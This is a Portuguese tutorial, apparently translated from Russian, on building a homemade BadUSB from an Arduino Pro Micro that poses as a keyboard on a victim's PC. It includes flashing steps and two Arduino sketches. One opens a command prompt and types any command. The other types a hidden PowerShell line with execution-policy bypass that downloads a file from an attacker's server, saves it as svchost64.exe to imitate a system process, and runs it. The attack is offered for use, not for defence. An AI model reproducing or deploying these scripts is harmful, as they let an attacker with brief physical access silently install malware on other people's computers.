Olá a todos, hoje vamos discutir um tópico como criar uma unidade flash Badusb caseira.

Para funcionar, precisamos de:

Arduino (qualquer um com emulação usb serve)

Arduino IDE

Conhecimento da sintaxe C/C++

Escolhendo uma placa Arduino

Estaremos usando um Arduino micro pro. Compacto, com memória adequada para escrever scripts, modelo barato, nos convém perfeitamente!

Como
funciona o circuito
Em nosso trabalho, utilizamos o módulo Keyboard, quando o arduino é conectado a uma fonte de energia, o processador da placa começa a processar o script, e envia comandos para o módulo usb, que emula o teclado. Assim, o sistema do PC da vítima define o arduino como um teclado.
Para iniciar o ataque, basta inserir uma placa pré-flash no PC. A placa é atualizada através do software Arduino IDE.
Preparando para o firmware
1. Colocamos o Arduino IDE , durante a instalação concordamos em instalar os drivers.

2 Conectamos a placa ao PC por meio de um cabo USB.

3 . Entramos no programa e selecionamos nosso arduino no menu de seleção de porta

Preparar ! Agora podemos começar a escrever scripts.

Nós escrevemos
roteiros
Ao pesquisar scripts normais para arduino, você receberá uma merda, em todos os lugares apenas scripts na linguagem Rubber Ducky Script. Mas na Internet existe um site maravilhoso Duckuino , cole o script Rubber ducky acabado e copie o script C resultante feito para arduino!
O serviço é muito bom, mas às vezes o código pode ser convertido incorretamente.
Ao escrever nosso script, usamos o módulo Keyboard. Escrever scripts para ataques Badusb não é muito difícil, ou estude a família C, ou copie o código)

o script abre o console e executa o comando digitado na linha 3:

#include<Keyboard.h>
#define KEY_DELAY 50
const char command [] = "" ;

void setup() {
  Keyboard.begin();
  delay(3000);
}

void loop() {
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(KEY_DELAY*5);
  Keyboard.println("cmd");
  delay(KEY_DELAY*5);
  Keyboard.println(command);
  delay(100000);
}

Download oculto e lançamento de arquivo:

#include<Keyboard.h>
#define KEY_DELAY 50
const char command [] = " " ;
void setup() {
  Keyboard.begin();
  delay(3000);
}

void loop() {
  //Pressing Win+r shortcut
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(KEY_DELAY*5);
  Keyboard.println("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('ваш сервак',\\\"$env:temp\\svchost64.exe\\\"); Start-Process \\\"$env:temp\\svchost64.exe\\\"\"");
  delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started
  delay(10000000);
}

Na linha 16, substitua 'seu servidor' pelo caminho para o arquivo no servidor.Aqui

revisamos os dois scripts mais necessários para ataques, vamos passar a escrever scripts no quadro!

Escrevendo um script para um quadro

1. Copie o código e cole-o no editor Arduino IDE

2 . Compile e baixe o código

3 Pronto! Vamos testar se tudo funciona.